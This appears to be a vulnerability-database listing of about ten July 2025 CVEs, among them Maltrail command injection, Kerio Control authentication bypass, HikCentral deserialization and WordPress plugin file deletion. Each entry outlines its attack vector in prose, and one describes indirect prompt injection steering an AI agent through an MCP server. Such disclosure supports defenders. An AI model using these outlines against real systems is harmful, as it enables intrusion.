CVSS: 10.0EPSS: 73%CPEs: 1EXPL: 2CVE-2025-34073 – stamparm/maltrail <=0.54 Remote Command Execution
https://notcve.org/view.php?id=CVE-2025-34073
02 Jul 2025 — A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint. • https://vulncheck.com/advisories/stamparm-maltrail-rce • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-306: Missing Authentication for Critical Function •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 1CVE-2025-34071 – GFI Kerio Control Unsigned System Image Upload Root Code Execution
https://notcve.org/view.php?id=CVE-2025-34071
02 Jul 2025 — A remote code execution vulnerability in GFI Kerio Control 9.4.5 allows attackers with administrative access to upload and execute arbitrary code through the firmware upgrade feature. • https://ssd-disclosure.com/ssd-advisory-kerio-control-authentication-bypass-and-rce • CWE-306: Missing Authentication for Critical Function •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2025-34070 – GFI Kerio Control GFIAgent Missing Authentication on Administrative Interfaces
https://notcve.org/view.php?id=CVE-2025-34070
02 Jul 2025 — A missing authentication vulnerability in the GFIAgent component of GFI Kerio Control 9.4.5 allows unauthenticated remote attackers to perform privileged operations. The GFIAgent service, responsible for integration with GFI AppManager, exposes HTTP services on ports 7995 and 7996 without proper authentication. The /proxy handler on port 7996 allows arbitrary forwarding to administrative endpoints when provided with an Appliance UUID, which itself can be retrieved from port 7995. This results in a complete ... • https://ssd-disclosure.com/ssd-advisory-kerio-control-authentication-bypass-and-rce • CWE-306: Missing Authentication for Critical Function •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 1CVE-2025-34069 – GFI Kerio Control GFIAgent Authentication Bypass via Proxy Forwarding
https://notcve.org/view.php?id=CVE-2025-34069
02 Jul 2025 — An authentication bypass vulnerability exists in GFI Kerio Control 9.4.5 due to insecure default proxy configuration and weak access control in the GFIAgent service. The non-transparent proxy on TCP port 3128 can be used to forward unauthenticated requests to internal services such as GFIAgent, bypassing firewall restrictions and exposing internal management endpoints. This enables unauthenticated attackers to access the GFIAgent service on ports 7995 and 7996, retrieve the appliance UUID, and issue adminis... • https://ssd-disclosure.com/ssd-advisory-kerio-control-authentication-bypass-and-rce • CWE-306: Missing Authentication for Critical Function •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2025-34067 – Hikvision HikCentral (formerly "Integrated Security Management Platform") Remote Command Execution via applyCT Fastjson
https://notcve.org/view.php?id=CVE-2025-34067
02 Jul 2025 — By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. • https://s4e.io/tools/hikvision-applyct-remote-code-execution • CWE-502: Deserialization of Untrusted Data CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') •
CVSS: 9.0EPSS: 0%CPEs: 1EXPL: 0CVE-2025-2932 – JKDEVKIT <= 1.9.4 - Authenticated (Subscriber+) Arbitrary File Deletion
https://notcve.org/view.php?id=CVE-2025-2932
02 Jul 2025 — This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). • https://www.wordfence.com/threat-intel/vulnerabilities/id/68679ff9-48a8-4146-a37f-5f844dc86c92?source=cve • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •
CVSS: -EPSS: 0%CPEs: -EXPL: 6CVE-2025-47812 – Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
https://notcve.org/view.php?id=CVE-2025-47812
https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812 •
CVSS: 8.5EPSS: 0%CPEs: 1EXPL: 0CVE-2025-4946 – Vikinger <= 1.9.32 - Authenticated (Subscriber+) Arbitrary File Deletion via vikinger_delete_activity_media_ajax Function
https://notcve.org/view.php?id=CVE-2025-4946
01 Jul 2025 — This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). • https://themeforest.net/item/vikinger-buddypress-and-gamipress-social-community/28612259 • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •
CVSS: 7.6EPSS: 0%CPEs: 1EXPL: 0CVE-2025-53107 – @cyanheads/git-mcp-server vulnerable to command injection in several tools
https://notcve.org/view.php?id=CVE-2025-53107
01 Jul 2025 — Successful exploitation can lead to remote code execution under the server process's privileges. ... An MCP Client can be instructed to execute additional actions for example via indirect prompt injection when asked to read git logs. • https://github.com/cyanheads/git-mcp-server/commit/0dbd6995ccdf76ab770b58013034365b2d06c4d9 • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') •
CVSS: 7.6EPSS: 0%CPEs: 1EXPL: 0CVE-2025-6464 – Forminator Forms – Contact Form, Payment Form & Custom Form Builder <= 1.44.2 - Unauthenticated PHP Object Injection (PHAR) Triggered via Administrator Form Submission Deletion
https://notcve.org/view.php?id=CVE-2025-6464
01 Jul 2025 — If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. • https://plugins.trac.wordpress.org/browser/forminator/trunk/library/model/class-form-entry-model.php#L1249 • CWE-502: Deserialization of Untrusted Data •